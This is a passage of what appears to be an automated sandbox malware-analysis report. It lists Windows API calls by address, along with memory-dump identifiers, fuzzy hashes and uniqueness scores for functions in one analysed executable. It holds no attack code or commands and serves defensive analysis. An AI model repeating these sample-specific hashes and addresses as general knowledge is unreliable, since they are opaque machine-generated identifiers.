                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00C08BCD
                                                                      • VariantClear.OLEAUT32 ref: 00C08C3E
                                                                      • VariantClear.OLEAUT32 ref: 00C08C9D
                                                                      • VariantClear.OLEAUT32(?), ref: 00C08D10
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C08D3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: 0b895080b06b92aa86f6758f427cbfb15b9b2e85ed9d5cfccaf85d4bcbe45c00
                                                                      • Instruction ID: ae8777d73348bca973f0728e8f41807a3f53e6a7dbdae283cb2d5bd2c8c7449b
                                                                      • Opcode Fuzzy Hash: 0b895080b06b92aa86f6758f427cbfb15b9b2e85ed9d5cfccaf85d4bcbe45c00
                                                                      • Instruction Fuzzy Hash: CE517AB5A1021AEFCB10CF68C884AAAB7F8FF89310B158559F955EB350E730E911CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32 ref: 00C18BAE
                                                                      • GetPrivateProfileSectionW.KERNEL32 ref: 00C18BDA
                                                                      • WritePrivateProfileSectionW.KERNEL32 ref: 00C18C32
                                                                      • WritePrivateProfileStringW.KERNEL32 ref: 00C18C57
                                                                      • WritePrivateProfileStringW.KERNEL32 ref: 00C18C5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: e34b4c7e165ee05dd0df58ee33a1b0b87ff7a7bbe4735b54d7c937b3bd18d5f1
                                                                      • Instruction ID: 7d97ba9bc8e91108835be120f67afc7b3d8d6b00bc4f00bf4882856449132acc
                                                                      • Opcode Fuzzy Hash: e34b4c7e165ee05dd0df58ee33a1b0b87ff7a7bbe4735b54d7c937b3bd18d5f1
                                                                      • Instruction Fuzzy Hash: 21515A35A042159FCB00DF64C891AAEBBF5FF4A314F088099E849AB362CB31ED55DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C28F40
                                                                      • GetProcAddress.KERNEL32(00000000,?,00000000,?), ref: 00C28FD0
                                                                      • GetProcAddress.KERNEL32(00000000,00000000,00000000,?), ref: 00C28FEC
                                                                      • GetProcAddress.KERNEL32(00000000,?,00000041), ref: 00C29032
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C29052
                                                                        • Part of subcall function 00BBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C11043,?,759D3F18), ref: 00BBF6E6
                                                                        • Part of subcall function 00BBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00BFFA64,00000000,00000000,?,?,00C11043,?,759D3F18,?,00BFFA64), ref: 00BBF70D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      • Opcode ID: 932c385078e70106ea82b5757859a7b42910caf59e0e52070c259e22bcf15b2c
                                                                      • Instruction ID: 4bbdfd4c965fbb281edf9cc7e3e766bce25869a58a358e86b7ab0463222b1342
                                                                      • Opcode Fuzzy Hash: 932c385078e70106ea82b5757859a7b42910caf59e0e52070c259e22bcf15b2c
                                                                      • Instruction Fuzzy Hash: B8514935A05215DFC711DF58C4949ADBBF1FF49314F0880A9E81AAB762DB31EE85CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowLongW.USER32 ref: 00C36C33
                                                                      • SetWindowLongW.USER32 ref: 00C36C4A
                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C36C73
                                                                      • ShowWindow.USER32(00000002,00000000), ref: 00C36C98
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00C36CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MessageSendShow
                                                                      • String ID:
                                                                      • API String ID: 3688381893-0
                                                                      • Opcode ID: fe743b21fa6228a5191cf3c5af8aaea981353c5034a71f52ec51b93bd6e46323
                                                                      • Instruction ID: d29d0175dcbba94f2fcffd60ce5d4dec0e581a295c721dae83350f637d0a5083
                                                                      • Opcode Fuzzy Hash: fe743b21fa6228a5191cf3c5af8aaea981353c5034a71f52ec51b93bd6e46323
                                                                      • Instruction Fuzzy Hash: 98410A35624104BFDB24CF38DC95FA9BBA4EB09350F149224FCA5A72E0C371EE41DA50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 06d955b5d9a4e28918f262dcd76b08b74bb64fb3ac650b875155be5277a1555f
                                                                      • Instruction ID: 3eb8defb9e83ea9b3ebb098a7f3487898da65327011d300195c3a460de0d47e5
                                                                      • Opcode Fuzzy Hash: 06d955b5d9a4e28918f262dcd76b08b74bb64fb3ac650b875155be5277a1555f
                                                                      • Instruction Fuzzy Hash: 3F41A136A00240AFCB24DF78C881A6DF7E5EF99314B1585AAE515EB351E631AD01DB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00C138CB
                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C13922
                                                                      • TranslateMessage.USER32(?), ref: 00C1394B
                                                                      • DispatchMessageW.USER32(?), ref: 00C13955
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C13966
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      • Opcode ID: aab3c8410ad2f6dbdd913326f501d850244ac2e9b4b43c12664aeb921e035794
                                                                      • Instruction ID: 92a4780192c8a45003f5b09d9717ee20feac7750b2f0b35fc9d39e12af9ada62
                                                                      • Opcode Fuzzy Hash: aab3c8410ad2f6dbdd913326f501d850244ac2e9b4b43c12664aeb921e035794
                                                                      • Instruction Fuzzy Hash: 2F31A6705043C19EEB35CB359849BFA3BA8AB07318F08456AE876961E0E3B497C5EB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00C1CF38
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00C1CF6F
                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFB4
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFC8
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                      • String ID:
                                                                      • API String ID: 3191363074-0
                                                                      • Opcode ID: b080d513108c19bfd5042908e1db7cc9b925de73358a4c327c3f3476840918c9
                                                                      • Instruction ID: 4e854cecbdbcb5af1774b1c20bf106fdfcec5a133fa0695001a9408a8a05246c
                                                                      • Opcode Fuzzy Hash: b080d513108c19bfd5042908e1db7cc9b925de73358a4c327c3f3476840918c9
                                                                      • Instruction Fuzzy Hash: 88313A71540205AFDB20DFA5C8C4AEFBBF9EB16350B10446EF526E2150DB30EE82AB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 23a914c890bd8451dfeaa0e07a0df7973612266432dd9ffa1ee9b3d1eeb4ea02
                                                                      • Instruction ID: bacca62646479a4df96ab9028fc278cd09d227cb580f4cfc0225b976a35d5b4e
                                                                      • Opcode Fuzzy Hash: 23a914c890bd8451dfeaa0e07a0df7973612266432dd9ffa1ee9b3d1eeb4ea02
                                                                      • Instruction Fuzzy Hash: B331C071A10219EFCB00CFA8CD99BDE7BB5EB05315F144229FD21A72D1C7709A54DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C35745
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C3579D
                                                                      • _wcslen.LIBCMT ref: 00C357AF
                                                                      • _wcslen.LIBCMT ref: 00C357BA
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C35816
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 763830540-0
                                                                      • Opcode ID: 616cf8251dba92bae86e24b47501a4b3834e3f5340f280b4d31718363ecf42fa
                                                                      • Instruction ID: 784cf78b486569f930907c4177b2994d61c09e912a0b424644070fcbcbbf6272
                                                                      • Opcode Fuzzy Hash: 616cf8251dba92bae86e24b47501a4b3834e3f5340f280b4d31718363ecf42fa
                                                                      • Instruction Fuzzy Hash: 082180759246189ADB209FA5CC85BEE7BB8FF05724F108256F929EA1C0D7708A85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00C20951
                                                                      • GetForegroundWindow.USER32 ref: 00C20968
                                                                      • GetDC.USER32(00000000), ref: 00C209A4
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00C209B0
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00C209E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: 11afa4819ab2a5feb5c8e3c2ac6b33718172633854ed1a951b2291ff4566d004
                                                                      • Instruction ID: 0e6bf201c946550ba1dbea22d6765c8ba7da533e814003981ef01eb4b12ea977
                                                                      • Opcode Fuzzy Hash: 11afa4819ab2a5feb5c8e3c2ac6b33718172633854ed1a951b2291ff4566d004
                                                                      • Instruction Fuzzy Hash: D821CD35A00214AFD704EF65D889BAEBBF9EF49300F048069F85AA7762CB30AC44DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00BDCDC6
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BDCDE9
                                                                        • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BDCE0F
                                                                      • _free.LIBCMT ref: 00BDCE22
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDCE31
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: de9278ed738f354bfe05d64ff6b7ef77468285276b1df1b2b0f5882f050a89cd
                                                                      • Instruction ID: 27f3177a66fd9e799ed9ddb0dda608ee6574f05873afc2a241b42ec464f1b9ae
                                                                      • Opcode Fuzzy Hash: de9278ed738f354bfe05d64ff6b7ef77468285276b1df1b2b0f5882f050a89cd
                                                                      • Instruction Fuzzy Hash: 3A01B5B26012167F23211ABA6C88E7FFEADDEC6BA1315016AF905D7301FA619D01D2B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00BB9693
                                                                      • SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                                      • BeginPath.GDI32(?), ref: 00BB96B9
                                                                      • SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 6b46ee5ee8e38814b88625446d4ea171b6f2bff35baf009191c9e21978c3f8f8
                                                                      • Instruction ID: 79a5842555607972d20fb686da37b4763602837cc317032b5fa0776980fc0ad6
                                                                      • Opcode Fuzzy Hash: 6b46ee5ee8e38814b88625446d4ea171b6f2bff35baf009191c9e21978c3f8f8
                                                                      • Instruction Fuzzy Hash: D2217C31812305EBDB119F28EC59BFD7BF8FB10315F180256FA19A61B0D3B09896DB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: ce82fda6f981ff65146a8f478946912645547da6cf10faaafbac1ef3c25bdec6
                                                                      • Instruction ID: b3f04decee49c8a37f3660d3292017046e196b6526a660b5b77cc674082de1dc
                                                                      • Opcode Fuzzy Hash: ce82fda6f981ff65146a8f478946912645547da6cf10faaafbac1ef3c25bdec6
                                                                      • Instruction Fuzzy Hash: 2C01F9A1695605BBD71855199E42FBB738CDF61398F000438FD14AA2C2F720EE11DAE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00BCF2DE,00BD3863,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6), ref: 00BD2DFD
                                                                      • _free.LIBCMT ref: 00BD2E32
                                                                      • _free.LIBCMT ref: 00BD2E59
                                                                      • SetLastError.KERNEL32(00000000,00BA1129), ref: 00BD2E66
                                                                      • SetLastError.KERNEL32(00000000,00BA1129), ref: 00BD2E6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 76a35a4cd32fde40ccf6062935efb441687299d1d2a52b4005dc2c8cdc7f5d66
                                                                      • Instruction ID: 042d7b2b7b8e18d2e284a600ca7482dec5145e2e50dbcb03aa9a4cdc2bacd276
                                                                      • Opcode Fuzzy Hash: 76a35a4cd32fde40ccf6062935efb441687299d1d2a52b4005dc2c8cdc7f5d66
                                                                      • Instruction Fuzzy Hash: 1801F9365056806BC61227356CC5F6FA7D9EBF17B272444B7F425A3392FB74CC014120
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32 ref: 00C0002B
                                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00C00046
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BFFF41,80070057,?,?), ref: 00C00054
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C00064
                                                                      • CLSIDFromString.OLE32(?,?), ref: 00C00070
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: c780d680302ca2512a2812fa8c934e8018d2926427f675b5525b185b1dcaaf66
                                                                      • Instruction ID: a53521d93af85659b281bd688bc4a33c02a9066162d4fc69551b547d209c459a
                                                                      • Opcode Fuzzy Hash: c780d680302ca2512a2812fa8c934e8018d2926427f675b5525b185b1dcaaf66
                                                                      • Instruction Fuzzy Hash: 44018F76610204BFDB104F69DC48BAE7BADEB44756F254124F905E2290DB75DE40CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C0E997
                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00C0E9A5
                                                                      • Sleep.KERNEL32(00000000), ref: 00C0E9AD
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C0E9B7
